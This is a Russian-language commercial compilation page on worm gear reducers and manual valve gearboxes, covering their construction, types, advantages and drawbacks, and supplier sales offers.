51 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Редуктор червячный ручной привод

Редукторы червячные

Червячный редуктор — приводной механизм, используемый для понижения частоты вращения выходного вала. Конструктивно данный тип редуктора представляет собой червячную передачу, заключенную в чугунный или алюминиевый корпус и обеспечивающую изменение крутящего момента и угловой скорости.

Мы осуществляем продажу оборудования на всей территории России. Дилерские соглашения позволяют нам устанавливать оптимальные для заказчика цена на продукцию. По техническим вопросам обращайтесь к нашим консультантам, которые помогут вам рассчитать и купить червячный редуктор под конкретные задачи.

Редукторы NRV

Унифицированные присоединительные размеры (в серии представлено девять типоразмеров) позволяют использовать червячный редуктор NRV в качестве замены устаревшего оборудования. Редуктор обеспечивает крутящий момент до 1400Н•м на медленном валу. Дополнительным преимуществом модели является ее цена — одна из самых низких среди редукторов с червячной передачей.

Редукторы 2Ч

Одноступенчатый редуктор 2Ч имеет три типоразмера: 40, 63 и 80. Наиболее ходовой является модель 2Ч-40, получившая широкое распространение в приводных механизмах. Червячные редукторы данной серии выпускаются в нескольких вариантах компоновки с различным расположением валов и червячной пары.

Редуктор Ч-80

Червячный одноступенчатый редуктор, предназначенный для работы с постоянной или переменной нагрузкой произвольной направленности. Диапазон передаточных чисел — от 8 до 80, разброс крутящих моментов — от 175 до 300 Н*м.

Редуктор 4Ч-80

НАЗНАЧЕНИЕ: Механизм червячный одноступенчатый универсальный для общемашиностроительного применения (тип 4Ч-80А) служит для изменения крутящего момента и частоты вращения вала в приводах машин и механизмов.

Редукторы Ч

НАЗНАЧЕНИЕ: Предлагаются к продаже редукторы червячные одноступенчатые универсальные Ч-100, Ч-125, Ч-160. Они имеют общее назначение и предназначены для изменения крутящего момента и частоты вращения и эксплуатации в микроклиматических районах с умеренным климатом, с сухим и влажным тропическим климатом категорий размещения 1, 2, 3, 4 по ГОСТ 15150-69.

Редуктор 1Ч-160

НАЗНАЧЕНИЕ: Механизм червячный одноступенчатый универсальный 1Ч-160 является редуктором общего назначения, служит для изменения крутящего момента и частоты вращения вала при эксплуатации в микроклиматических районах с умеренным климатом, с сухим и влажным тропическим климатом категорий размещения 1, 2, 3, 4 в соответствии с ГОСТ 15150-69.

Редуктор 1Ч-63А

НАЗНАЧЕНИЕ: Редуктор червячный одноступенчатый универсальный 1Ч-63А – это редуктор общего назначения, служащий для изменения крутящего момента и частоты вращения вала.

Редуктор Ч2-160

НАЗНАЧЕНИЕ: Двухступенчатый червячный механизм типа Ч2-160 предназначен для изменения крутящего момента и частоты вращения в приводах машин, оборудования и механизмов.

Редуктор 4Ч-63А

Червячный редуктор общепромышленного назначения, предусматривающий как фланцевое крепление, так и установку на лапы. Техническое обслуживание данного оборудования осуществляется непосредственно на месте его использования. Замена масла выполняется спустя 150 ч после первого запуска. Агрегаты 4Ч-63A — это качественное и долговечное оборудование, отличающееся невысокой ценой и универсальностью.

Устройство и принцип работы

Основу червячного редуктора составляет червячная пара. На входном валу агрегата установлен червяк [1] (винт со спиральной нарезкой), который передает крутящий момент на выходной вал, вступая в зацепление с зубьями червячного колеса [2]. Из-за такой конструкции червячную передачу иногда называют зубчато-винтовой. Оси валов в агрегате расположены под углом 90 градусов по отношению друг к другу.

Червяки обычно изготавливают из углеродистых и легированных сталей, прошедших термообработку. Для венца зубчатых колес, как правило, используют бронзу, реже чугун.

Редуктор червячный способен воспринимать значительные нагрузки, при этом обеспечивает большие передаточные отношения (от 10:1 до 500:1). Агрегат имеет компактные размеры и характеризуется практически бесшумной работой.

Одноступенчатые и многоступенчатые приводы

Червячные редукторы могут иметь разное количество ступеней. В зависимости от этой характеристики различают одноступенчатые и многоступенчатые редукторы. Наибольшее распространение получили одноступенчатые агрегаты, которые характеризуются плавностью работы и самоторможением. Передаточный винт в таких устройствах может располагаться под червячным колесом, над ним, горизонтально либо вертикально сбоку от колеса. Выбор компоновки червячного редуктора определяется возлагаемыми на него задачами, а также условиями монтажа.

Недостатки

Одним из недостатков редуктора с червячной передачей являются высокие рабочие температуры. Это связано с тем, что передача испытывает трение скольжения, а не качения, как, например, в цилиндрических редукторах. Такая особенность чревата сильным нагревом привода при продолжительной работе и быстрым износом движущихся частей.

Червячный редуктор нуждается в качественной смазке. Рекомендуется использовать синтетические смазки, поскольку они обладают термоустойчивостью и способны понизить рабочую температуру агрегата. Кроме того, синтетика отличается сравнительно невысокой ценой.

Также необходимо отметить низкий КПД редукторов. Однако, несмотря на определенные минусы червячных агрегатов, они достаточно широко используются в промышленности.

Применение

Червячный редуктор является одним из компонентов механического или электромеханического привода. В его задачи входит увеличение крутящего момента на выходном валу при сохранении мощности привода (за вычетом неизбежных потерь при передаче крутящего момента). Также агрегат используется для изменения направления вращения валов.

Червячные редукторы получили широкое распространение в различных отраслях промышленности. В качестве приводных механизмов они используются в транспортерах, насосах, бетономешалках и растворосмесителях, в металлообрабатывающих и деревообрабатывающих станках, в кранах и подъемниках различных типов, эскалаторах, в лифтовом оборудовании.

Червячный редуктор: описание.виды.принцип работы,ремонт,фото,видео.

Червячный редуктор нередко считается важною деталью не только в сфере производства автомобилей. Червячная передача считается важной деталью везде, где требуется увеличить крутящий момент и уменьшить количество вращений привода. Такой механизм используется для привода ворот, подъемников, станков для обработки металлов, дерева и других подобных устройств. Практически каждый человек видел червячный редуктор, иногда даже не подозревая об этом.

Дело в том, что нередко такой механизм привода прячут в корпус, чтобы механизм не забивался пылью и прочим мусором, и это существенно продлевает срок службы механизма. Червячный редуктор так часто используется по причине того, что коэффициент полезного действия этого механизм очень высок. Такой механизм может иметь как маленькие размеры, так и большие.

Из-за своих небольших размеров чаще всего червяная передача применяется в производстве автомобилей. Каждый преобразователь имеет свое передаточное число. Такое число зачастую указывается на упаковке прибора, либо на самом корпусе.

Достоинства и недостатки

Червячная передача в силу своих конструктивных особенностей имеет как достоинства, так и недостатки.

Из достоинств стоит отметить плавность хода, эффект самоторможения, низкий уровень шума, большое передаточное отношение с использованием всего двух деталей.

Из недостатков следует обратить внимание на сравнительно низкий КПД, повышенный износ, заедание, большое тепловыделение вследствие сил трения. Низкий КПД обуславливает применение подобных механизмов при передаче относительно небольших мощностей до 100 кВт. Для предотвращения скорого износа и заедания необходимо соблюдать требования к точности сборки и регулировать механизмы. Высокое тепловыделение требует специальных установок для отвода лишнего тепла.

Различие редукторов в основном сводится к различиям червяков и зубчатых колес, из которых собран данный червячный редуктор.

Червяки разделяются на типы по следующим признакам:

  • по количеству заходов резьбы: однозаходные, многозаходные
  • по направлению нарезки резьбы: правые, левые
  • по форме винта, на котором нарезана резьба: цилиндрические, глобоидные
  • по форме профиля резьбы: с конволютным профилем, с архимедовым профилем, с эвольвентным профилем
  • Зубчатые колёса разделяются на типы по следующим признакам:
  • по типу колеса: собственно колесо, зубчатый сектор, вырожденный сектор
  • по профилю зубьев: прямой, вогнутый, роликовый (вместо зубьев используется вращающийся ролик)

Червячные редукторы со встроенным двигателем называются червячными мотор-редукторами. В редукторах чаще всего двигательный вал располагается под прямым углом к движимому. Компоновка червячного редуктора выбирается исходя из конкретных требований к устройствам. Двигатель может располагаться как сверху приводимого в движение колеса, так и снизу и сбоку. При боковом расположении двигатель устанавливается вертикально. Вследствие вертикального расположения усложняется процесс смазки подшипников вала, а также чистки внешних элементов.

Для увеличения передаточного числа используются разные технологии, но наиболее эффективной является применение большего числа ступеней.

Для смягчения сил трения и повышения сопротивления заеданию применяются специальные вязкие смазочные составы или масла. При низких скоростях вращения смазка осуществляется при помощи специальных ванночек с маслом либо использованием специальных устройств, разбрызгивающих смазку в места повышенного трения. Для червячных редукторов, скорость вращения которых высока применение ванночек нецелесообразно, и применяется принудительная смазка охлаждёнными смазочными материалами.

Основные преимущества редуктора червячного перед зубчатыми передачами заключаются в том, что начальный контакт звеньев происходит не в точке, а по линии. Также входной и выходной валы могут скрещиваться под разными углами, но чаще всего этот угол составляет 90 градусов. Также червячная передача занимает гораздо меньше места, чем зубчатая при одинаковом большом передаточном отношении.

Помимо червячного редуктора червячная передача также применяется в системах регулирования и управления различными устройствами. Благодаря самоторможению обеспечивается точная фиксация положения, а большое передаточное отношение (до 1000) позволяет наиболее точно отрегулировать положение, либо использовать маломощные двигатели. Также червячные передачи и червячные редукторы отлично подходят для установки в качестве механизма передачи в подъёмные и лебёдочные механизмы благодаря своим конструктивным особенностям.

Некоторые технические характеристики промышленно производимых и широко распространённых червячных редукторов.

Самыми распространёнными являются одноступенчатые мотор-редукторы.

Червячные

Редукторы с червячной передачей — один из самых распространённых типов редукторов. Червячные редукторы NMRW (NMRV) на сегодняшний день представляют собой передовое решение для решения современных задач и соответствующее основным требованиям рынка с точки зрения эффективности.

Элементами червячной передачи являются: червяк (стальной) с червячным колесом (бронзовый). Червяк – это вал, с нарезанной на нём резьбой, выполненный из стали. Червячное колесо — это бронзовое колесо с косым расположением зубьев и специальным профилем. Когда червяк вращается, его витки двигаются вдоль оси и передают вращение червячному колесу . Червячное колесо располагается перпендикулярно червяку. Расстояние между плоскостями осей червячного колеса и червяка определяет размер редуктора. В червячных редукторах этот размер является частью обозначения редуктора, которая определяет его габарит. Рассмотрим на примерах: NMRW090 — это одноступенчатый червячный редуктор, с межосевым расстоянием 90 мм, а у редуктора NMRW150 межосевое расстояние будет соответствовать значению 150, указанному в маркировке, т. е. будет равно 150 мм.

Классификация червячных редукторов NRW (NRV)

Серия NMRW редукторов ESQ выпускается в виде компактного редуктора, который обладает высокой модульности конструкции, что позволяет собирать многоступенчатые редукторы на базе одноступенчатого червячного редуктора . Многоступенчатыми мотор-редукторами и редукторами собранными на базе NMRW являются: PCRW – цилиндро-червячный мотор-редуктор, двухступенчатый, собранный на базе цилиндрической приставки и червячного редуктора , DRW – червячный мотор-редуктор, двухступенчатый, собранный на базе двух червячных редукторов.

Классифицируются червячные редукторы следующим образом:

  • Одноступенчатые. Редукторы одноступенчатые червячные — это один из самых распространенных редукторов. В одноступенчатых червячных редукторах передаточные отношения достигают 100. Червяк может располагаться вертикально или горизонтально относительно червячного колеса.
  • Многоступенчатые. Многоступенчатые червячные редукторы собираются на базе одноступенчатых редукторов. Многоступенчатые редукторы и мотор-редукторы бывают следующих типов: PCRW – цилиндро-червячный мотор-редуктор, двухступенчатый, собранный на базе цилиндрической приставки и червячного редуктора, DRW – червячный мотор-редуктор, двухступенчатый, состоит из двух одноступенчатых червячных редукторов.

Области применения мотор-редукторов очень широки. Червячные мотор-редукторы вы можете найти в таком оборудовании как: транспортеры, конвейеры, подъемники, насосы, мешалки, приводы ворот и т.п.

Мотор-редуктор, по сути, является сердцем машин и механизмов, работающих от электричества. Поэтому правильный выбор червячного мотор-редуктора NMRW является очень важным при проектировании сборки машин и механизмов. При подборе конкретной модели червячного мотор-редуктора NMRW (NMRV), необходимо учитывать такие технические характеристики как:

  • мощность мотора, входящего в состав мотор-редуктора,
  • тип редуктора, входящего в состав мотор-редуктора,
  • обороты на выходе мотор-редуктора передаточное,
  • число редуктора в составе мотор-редуктора,
  • конструкция входного и выходного валов редуктора в составе мотор-редуктора,
  • тип монтажа мотор-редуктора,
  • дополнительные функции мотор-редуктора.

Преимущества червячных мотор-редукторов ESQ серии NMRW:

  • комплектующие изготавливаются по технологии литья под высоким давлением. Такая технология дает повышенную прочность комплектующим редуктора
  • повышенный крутящий момент редуктора
  • все габариты редуктора исполнены в литом корпусе (алюминий/чугун)
  • не более 150° в течение 24 часов подряд возможная термическая нагрузка на металлические элементы
  • высокий сервис-фактор при соблюдении технических условий эксплуатации

Специальные исполнения червячных мотор-редукторов ESQ серии NMRW:

  • мотор-редуктор с установленным тормозом 380/220 В
  • мотор-редуктор с установленным двойным тормозом 380/220 В
  • мотор-редуктор с электродвигателем с независимой вентиляцией
  • мотор-редуктор с подготовкой двигателя для работы с ЧПУ
  • мотор-редуктор с двигателями с датчиками температурной защиты обмоток статора и подшипников
  • мотор-редуктор с однофазным двигателем
  • мотор-редуктор с двигателям оснащенными антиконденсатным подогревом обмоток статора
  • мотор-редуктор со взрывозащищенным электродвигателем

Подобрать и купить червячный мотор-редуктор Вы можете, воспользовавшись удобной формой подбора, разработанной нашими специалистами. Если Вам необходима подробная консультация по выбору мотор-редуктора или редуктора, наши технические специалисты всегда помогут вам. Мы работаем на всей территории Российской Федерации и в Казахстане.

Редуктор червячный ручной привод

РМЗ.А / РМЗ.Б Ду 350-600

Редукторы РМЗ представляют собой устройство, преобразующее угловую скорость и момент создаваемый на маховике, используя червячную передачу. Редукторы РМЗ для дисковых затворов ЗПФ производятся двух типов:

-РМЗ.А — одноступенчатый редуктор(передаточное отношение 50:1, 80:1);

-РМЗ.Б – двухступенчатый редуктор (передаточное отношение 360:1, 600:1)

Расположение маховика вертикальное.

  • Вращение по часовой стрелке входного вала ведет к вращению по часовой стрелке выходного вала.
  • Редукторы РМЗ предназначены для эксплуатации непосредственно маховиком;

Климатическое исполнение по ГОСТ 15150 . У1

Температура окружающей среды . от -20 до +60°С

Червячные редукторы — это устройства механического типа задача которых преобразование частоты вращения и крутящего момента между скрещивающимися осями. Основным элементом червячного редуктора является червячная пара, состоящая из одно-, двух- или четырехзаходного червяка и зубчатого колеса. Каждая такая червячная пара способна понижать скорость от 5 до 100 раз, а при необходимости более высоких передаточных чисел редуктор может иметь и или три ступени. Конструкция червячной пары очень похожа на винт и развернутую гайку находящихся в зацеплении. Во время вращения винта происходит движение гайки при этом скорость движения значительно ниже начального вращения. Также во время работы червячной пары осуществляется увеличение крутящего момента пропорционально трансформации вращения. Избежать потери на трение и нагрев помогает взаимное скольжение которая достигается путем применения антифрикционных материалов и специальный густой смазки.

Где применяются червячные редукторы

Промышленные червячные редукторы способны эксплуатироваться с большими нагрузками в длительном режиме, а их монтаж очень прост и не требует больших вложений. На сегодняшний день агрегата являются самыми распространенными среди других приводов и применяются в таких отраслях деятельности, как: машиностроение, металлургия, сельское хозяйство, добыча полезных ископаемых.

Червячный редуктор с успехом применяется в сверлильных токарных, шлифовальных, фрезерных и других металлорежущих станках. Приобрести его можно теперь и в нашем городе по оптимальной цене, обратившись в нашу компанию. Неоспоримым преимуществом червячного редуктора является простота в эксплуатации и низкая стоимость. В процессе эксплуатации агрегат плавно без рывков преобразует крутящий момент с высокой кинематической точностью. Выбирая червячный редуктор, можно отказаться от механического тормоза, так как агрегат обладает функцией самоторможения, что позволит избежать аварийных ситуаций при отключении электропитания.

Основные преимущества механизма

  • высокая перегрузочная способность;
  • корпус из быстро охлаждающихся материалов;
  • широкий ряд передаточных чисел;
  • отсутствие шума в процессе эксплуатации;
  • компактные размеры и небольшая масса;
  • современный дизайн и удобное крепление;
  • низкая стоимость и доступность.

Приобретая червячный редуктор в нашей компании, вы получаете гарантию 12 месяцев с последующим сервисным обслуживанием.

Скачать прайс на Червячные редукторы: ZIP XLS

Как получить червячный редуктор в любую точку РФ за 2-3 дня и выиграть в цене?

Забудьте навсегда проблемы с доставкой червячных редукторов. В 99% случаях вы получите ваш товар за 2-3 дня.

Есть замена любым червячным редукторам. ЦЕНА ниже, чем у конкурентов.

NMRV, NRV

Червячные редукторы и мотор-редукторы

Ч-80, Ч-100, Ч-125, Ч-160

Одноступенчатые червячные редукторы

1Ч2-160

Двухступенчатые червячные редукторы

Cubex

Червячные редукторы и мотор-редукторы

Червячные редукторы в промышленности

Существует множество классов механических редукторов, одним из самых распространенных в промышленности является червячный редуктор.

Поскольку основным элементом его конструкции является механическая передача, то в зависимости от ее типа редуктор имеет соответствующую классификацию.

Червячная передача

Червячная передача — механизм, позволяющий передать и трансформировать энергию, полученную от силовой машины, к системе исполнения. Основным назначением червячной передачи является работа с крутящим моментом, а именно: его передача и трансформация.

Передача состоит из червяка — винта с резьбой — и червячного колеса с лубьями в форме дуги, огибающий окружность витка червяка. Червячная передача, находящаяся внутри корпуса редуктора, имеет изогнутый вид червяка. Именно отсюда и пошло ее название.

Забудьте про простой вашего оборудования, обратитесь в Stepmotor

Обращаясь в Stepmotor, вы получаете гарантию на червячные редукторы 24 месяца, паспорта на русском языке и доставку за 2-3 дня. Каждый клиент получит техническую консультацию по настройке и установке БЕСПЛАТНО.

Червячные редукторы в наличии на складе в СПб

Более 2500 довольных клиентов

Отгрузка в день оформления

Доставка по всей РФ за 2-3 дня

100% цена ниже конкурентов

10 заводов изготовителей

Одноступенчатые червячные редукторы

Самым распространенным типом являются редукторы червячные одноступенчатые.

В случаях, когда необходимо передать большие передаточные числа, используются двухступенчатые червячные редукторы. Одноступенчатые червячные редукторы имеют показатель крутящего момента до 480 кг/см при реверсивном направлении движения и до 220кг/см при нереверсивном. Существует три конструктивных варианта выполнения, которые имеют одноступенчатые редукторы: с правым, левым или двусторонним расположением выходного конца тихоходного вала.

Трансмиссия, которую имеют редукторы червячные двухступенчатые, может быть расположена над или под колесом, а также в горизонтальной или в вертикальной плоскости с боковой стороны. Расположение трансмиссии выбирается в зависимости от требований компоновки, но с учетом индивидуальных особенной каждого подтипа. Например, при использовании бокового расположения передачи снижается уровень смазки в подшипниках вертикальных валов.

Что говорят о нас клиенты?

ООО «ТЕГАС» выражает благодарность ООО «ТД Степмотор» за качественную работу по поставкам оборудования, также техническую поддержку и помощь в формировании технических заданий. Считаем возможным рекомендовать компанию ООО «ТД Степмотор», как квалифицированную и компетентную организацию в решении подобных задач.

Червяк в редукторе

Червяк в редукторе может быть расположен в двух положениях: верхнем или нижнем. Верхнее расположение над колесом используется в конструкции, если будут применяться большие окружные скорости. При окружных скоростях ниже 5 м/с используется нижнее расположение червяка, под колесом.

Основной материал для производства червяка — легированная сталь, однако зубья колеса предпочитают изготавливать из цветных металлов, для того чтобы снизить коэффициент трения скольжения. Также цветные металлы снижают нагрев в области зацепленная, однако перегрев все равно происходит. Повышенные температуры снижают вязкость масла, а это, в свою очередь, приводит к некорректной работе зубьев в передаче. Таким образом, даже применение цветных металлов не позволяет полностью избежать поверхностных разрушений зубьев — основной причины выхода из строя данного типа систем.

Для осуществления контроля состояния зубьев колеса предусмотрено специальное отверстие — смотровой люк с крышкой. Это конструктивное решение позволяет предварительно выявить неполадки в конструкции без полного демонтажа редуктора.

Сегодня в конструкции на валу червяка также предусматривается специальный вентилятор для обдува. Он позволяет снизить нагрев в области зацепления, там самым продляя рабочий цикл силовой установки.

Перед началом использования нового мотор-редуктора не забудьте провести его «обкатку». Обкатка системы производится в холостом режиме без нагрузки или с пониженной нагрузкой. Как правило, для приработки системы бывает достаточно 15 часов работы.

Преимущества одноступенчатых червячных редукторов

Компактные размеры

В отличие от одноклассовых редукторов червячный при аналогичных параметрах передаточного числа отличается компактными размерами. Достигнуть компактного размера позволяет особенная конструкция силовой установки. Благодаря скрещиванию входного и выходного вала (как правило, угол скрещивания составляет 90 градусов) система легче помещается в корпус и компонуется с другими компонентами силовой системы.

Плавность и бесшумность

Плавность и бесшумность работы, которую имеет мотор редуктор червячный, обусловлено особенностями конструкции зацепленная. Бесшумность работы довольно часто является обязательным параметром для производственных машин, и в этом случае данный тип силовых устройств всегда выигрывает у цилиндрических мотор-редукторов.

Самоторможение системы

Самоторможение системы — еще один важный «плюс». Он позволяет сэкономить на дополнительных устройствах торможения, требующихся в аналогичных редукторах другого подтипа. Однако данное свойство присуще установке только в том случае, если угол подъема винтовой линии не превышает 3,5 градуса.

Простота установки

Благодаря высокому передаточному числу, которое имеет мотор редуктор червячный одноступенчатый, производители могут сэкономить: это возможно благодаря простоте конструкции установки. Тем не менее, тоже самое передаточное число является не только преимуществом, но и недостатком, поскольку не самым лучшим образом отражается на КПД червячный трансмиссии.

Недостатки червячных редукторов

Самоторможение

Самоторможение, как мы только что заметили, является одновременно и преимуществом, и недостатком силовой установки. Если присутствует необходимость повернуть входной вал, то сделать это без активации привода червонного редуктора будет невозможно.

Невысокий КПД

Невысокий КПД — основная причина, почему червячный редуктор имеет ограниченное количество областей распространения. Чем выше передаточное число системы, тем ниже опускается показатель КПД. Первопричиной пониженного КПД является наличие трения между зубьями червячного колеса и витками червяка. Что также немаловажно, при повышенных нагрузках в течение продолжительного количества времени (свыше 200 часов) КПД может снижаться на 10% от номинального.

Высокий тепловой нагрев

Чем ниже показатель КПД, тем выше тепловой нагрев и потери энергии. И если маломощные установки могут обойтись без дополнительной системы теплохода в своей конструкции, то у редукторов с мощностью от 4 кВт возникает дополнительная необходимость организации теплоотвода. В качестве стандартных способов отвода тепла используются специальные вентиляционные решения на торцевой стороне, а также особенная система циркуляции масла. Тем не менее даже маломощные одноступенчатый редукторы имеют нагревание корпуса в любых рабочих условиях.

Работа только при равномерных нагрузках не позволит системе долго функционировать. Рабочий цикл системы не подразумевает испытания неравномерных нагрузок, а также слишком частых запусков и остановок.

Ограничение передаваемой мощности

Ограничение передаваемой мощности составляет 15 кВт, хотя в принципе физической границей мощности является 60 кВт. Таким образом если показатель передаваемой мощности составляет более 15 кВт, то производители мотор-редукторов рекомендуют отказаться от червонного типа в пользу цилиндрических мотор-редукторов. Отдельным подтипом высоко мощных червячных мотор-редукторов являются глобоидальные червячные редукторы. В этом типе систем используется измененная конструкция винта, за счет чего достигаются повышенные показатели передаваемой мощности.

Люфт выходного вала

Люфт выходного вала присутствует в системе с самого начала ее эксплуатации. По мере износа силовой установки, прямо пропорционально увеличивается и люфт конструкции.

Невысокий рабочий ресурс

Если сравнивать червячные редукторы с цилиндрическими, то ресурс первых в два с половиной раза ниже вторых. Это обусловлено повышенным трением скольжения, которое напрямую увеличивает износ конструкции. И если в цилиндрических системах износ составляет от 25,000 часов, то в цилиндрических мотор-редукторах рабочего ресурса хватает на 10,000 часов.

Частое обслуживание

Обслуживание этого типа систем необходимо выполнять гораздо чаще, а, следовательно, и тратить денежные средства на сервисные работы опять же необходимо регулярно. Обязательно обратите внимание на эту особенность, когда соберетесь купить червячный мотор редуктор для своего производства.

Червячные редукторы

Червячные редукторы – механизмы, реализованные на базе особого зацепления – пользуются самой большой популярностью благодаря высокой надежности, функции самоторможения и эффективности работы. В зависимости от исполнения их делят на одно- и многоступенчатые. При этом базовые функции механизмов всех типов остаются неизменны – преобразование низкого момента силы на входе в высокий на выходе. Показатели преобразования прямо зависят от исполнения приводного устройства.

Червячные передачи относят к передачам с зацеплением и применяют для передачи вращения между перекрещивающимися валами (обычно под углом 90°). Движение передается по принципу винтовой пары: червяк – винт, червячное колесо – сектор – полоска, вырезанная из длинной гайки, и изогнутая по окружности.

Червячные редукторы от ООО «Привод»

Компания ООО «Привод» осуществляет выпуск и продажу широкого спектра электротехнических изделий. Мы предлагаем редукторы:

  • цилиндрические;
  • цилиндрические крановые;
  • вертикальные крановые;
  • планетарные;
  • соосно-цилиндрические.

Но наиболее востребованным продуктом считается редуктор червячный. С помощью данного механизма крутящий момент передается посредством передачи-червяка. Ее еще иногда называют зубчато-винтовой, так как в роли передающих деталей выступают червячные шестеренки и винты-червяки.

Каталог червячных редукторов

Конструктивные особенности червячного редуктора

Основу конструкции составляет пара:

  • винт с трапецеидальной резьбой из качественной легированной стали (поскольку принимает максимальные нагрузки);
  • шестеренка – колесо с наружной нарезкой зубьев, червячной ее делает строгая подгонка зубчатой нарезки под размеры резьбы винта-червяка, обычно выполняется из другого материала, чтобы гарантировать эффективную работу всего устройства.

Количество каналов нарезки винта зависит от его типа: наиболее популярными сегодня остаются одно-, двух- и четырехзаходный механизмы.

Как работает червячный редуктор

Главная задача червячного редуктора – передача высокого крутящего момента при обеспечении малых угловых скоростей и функции самоторможения. Добиться этого позволяет особый способ взаимодействия пары червяк – шестеренка. Винт в червячном редукторе выступает ведущим звеном: вращаясь, он запускает шестерню, а та – передает крутящий момент колесу вращения тихоходного вала (на выходе). При этом передача принимает необратимые процессы самоторможения, подчиняясь закону отрицательной инерции. В результате происходит обратное превращение – высокого момента в низкий.

ООО «Привод»: только высококачественное оборудование!

Червячный редуктор имеет гарантию, которая предоставляется в соответствии с законодательством России. Наша команда специалистов занимается производством широкой линейки электротехнического оборудования и электродвигателей. Они продаются не только на территории РФ, но и далеко за ее пределами. В России вы можете купить необходимые агрегаты в следующих городах:

  • Москва;
  • Ростов-на-Дону;
  • Воронеж;
  • Киров;
  • Краснодар.

Возможна доставка по всей территории страны по предварительному согласованию с менеджерами. Уточняйте условия возможности доставки у менеджеров.

О преимуществах и недостатках

Червячный привод имеет не только преимущества, но и недостатки.

К преимуществам червячных редукторов относят:

  1. большие передаточные отношения в одной ступени, что приводит к уменьшению числа ступеней и соответственно числа деталей, особенно существенному при больших передаточных отношениях;
  2. плавная и бесшумная работа;
  3. возможность самоторможения;
  4. равномерный ход.

Их недостатки:

  1. низкий КПД, что приводит к повышенному тепловыделению и износу;
  2. необходимость применения для качественных червячных колес дорогостоящих материалов, содержащих олово;
  3. повышенные требования к точности монтажа.

Профессиональная регулировка и применение оригинальных деталей от ООО «Привод» позволит избежать данных проблем в дальнейшем. А тепловыделение может потребовать монтажа спецсистемы, которая будет отводить излишки тепла, скапливающиеся в червячном редукторе.

Червячные редукторы применяют там, где необходимы большие передаточные отношения и высокая точность (делительные устройства, механизмы наведения и т. п.) и при необходимости передачи вращения между перекрещивающимися валами; преимущественно при периодической работе и относительно небольшой мощности (вследствие низкого КПД) в подъемно-транспортных машинах, станках, автомобилях и т. д.

Червячные редукторы изготавливают с горизонтальным расположением тихоходного вала, при этом червяк над или под колесом и вертикальным.

Особенности червячных редукторов

Червячные редукторы бывают:

По резьбовым особенностям их делят на два типа:

Цилиндрические и другие формы винтов применяются в зависимости от сферы применения механизма. Червячный мотор-редуктор – это обыкновенный редуктор, к которому встроен электродвигатель. Основной вал двигателя расположен прямо напротив движимого (в перпендикулярном порядке). В зависимости от предъявляемых к приводному механизму требований могут быть установлены как мощные, так и очень мощные моторы. Их стоимость во многом определяется мощностью и типом двигателя. Данные механизмы быстро окупаются, несмотря на низкий КПД. Хотя в некоторых сферах деятельности не требуется максимальная производительность, а исключительно высокая надежность и долгий срок службы. В общем, задача данного механизма, которую он призван выполнять, строго определена и конкретна.

Мы заботимся о качестве!

Компания ООО «Привод» уделяет огромное внимание качеству выпускаемой продукции. Система контроля ОТК проверяет червячные редукторы на всех этапах производства, забраковывая неликвидные механизмы. Мы предоставляем высокие гарантии на электротехническое оборудование, сотрудничаем с физическими и юридическими лицами. Низкие цены как для постоянных, так и для всех остальных покупателей. Продукция сертифицирована, изготовлена в соответствии с отечественными стандартами ГОСТ и европейскими – ISO. По вопросам поставки редукторов и иного оборудования обращайтесь к нашим специалистам. Номера телефонов для связи расположены в разделе «Контакты». График работы: с 8 до 17 часов, выходные – суббота, воскресенье.

Редукторы производства Pro-Gear.

Производство приводного оборудования для автоматизации.

Инструкция по монтажу и установке

Ручные приводы Pro-Gear зарекомендовали себя как высококачественные и надежные изделия с очень высоким сроком службы и отменными характеристиками.

Приводы (редукторы) Прогир подходят для всех видов производственного применения, для использования в химической промышленности, отоплении, водоснабжении, энергетике, вентиляции и кондиционировании воздуха.

Ассортимент приводов Pro-Gear представлен 5-ю сериями.

Ручные механические приводы, редукторы Pro-Gear (Германия)

• Редукторы серии Х — алюминиевые четвертьоборотные редукторы алюминиевые четвертьоборотные редукторы серии X. ТеплоСити.

Четверть оборотные редукторы серии «X» отличаются своим небольшим весом, и менее высокой износостойкостью и надёжностью. Корпус механизмов выполнен методом литья алюминия под давлением. Все модели серии отличаются высококачественными подшипниками, а также качественным защитным порошковым покрытием методом дребеструйки.

Прогир Серия «Х» подходит для всех использования на производстве, для использования в химической промышленности, отоплении, водоснабжении, вентиляции, энергетике, кондиционировании воздуха.

Оборудование Pro-Gear предназначено для работы с пробковыми, шаровыми и дроссельными клапанами, а также с технологическими и энергетическими шиберным затворами (шиберами). Использование лёгких и высококачественных материалов обеспечивает их прочность и надёжность, а маленький вес редукторов идеально подходит для автоматизации работы современных шаровых кранов: NAVAL, BROEN, СИТАЛ, KLINGER, GENEBRE и др.

• Редукторы серии Q — чугунные четвертьоборотные редукторы

Четвертьоборотные редукторы Прогир серии Q прочные, надёжные, технологичные изделия, корпус и компоненты которого выполнены из чугуна. Все модели этой серии отличаются высококачественными подшипниками и качественным защитным порошковым покрытием.

Серия «Q» подходит для всех основных видов производственного использования так же как и для использования в химической промышленности, энергетике, отоплении, вентиляции, кондиционировании воздуха и водоснабжении. Оборудование компании Pro-Gear предназначено для работы с шаровыми, пробковыми, дроссельными клапанами так же хорошо, как и с энергетическими и технологическими шиберами.

Несколько опций, таких как ограничитель угла открытия, прямозубая цилиндрическая зубчатая передача и блок концевых выключателей могут быть легко установлены, поскольку все необходимые отверстия для креплений уже интегрированы в корпус.

• Редукторы серии QSS — четвертьоборотные редукторы из нержавеющей стали

Четверть оборотные редукторы серии «QSS» прочные, надёжные, технологичные изделия, корпус которых выполнен из нержавеющей стали 316. Все модели данной серии отличаются квадрантом из алюминиевой бронзы (AB2), индикатором позиции из нержавеющей стали 316, валом из нержавеющей стали 316, болтами из нержавеющей стали 316 и высококачественными подшипниками с тефлоновым покрытием.

Серия «QSS» идеально подходит для всех видов использования в высоко коррозийных средах, таких как на фармацевтических производствах, химических заводах, морских применениях. Оборудование компании Pro-Gear предназначено для работы с шаровыми, пробковыми, дроссельными клапанами так же хорошо, как и с энергетическими и технологическими шиберами.

Использование высококачественных материалов обеспечивает прочность, надёжность и очень высокую коррозийную устойчивость продукции для автоматизации работы современных кранов. Штурвалы, обеспечивающие плавное управление, доступны в различных диаметрах и изготовлены исключительно из нержавеющей стали 316. Так же доступны дополнительные опции, такие как устройства запирания на замок, концевые выключатели.

• Редукторы серии K, R — многооборотные редукторы

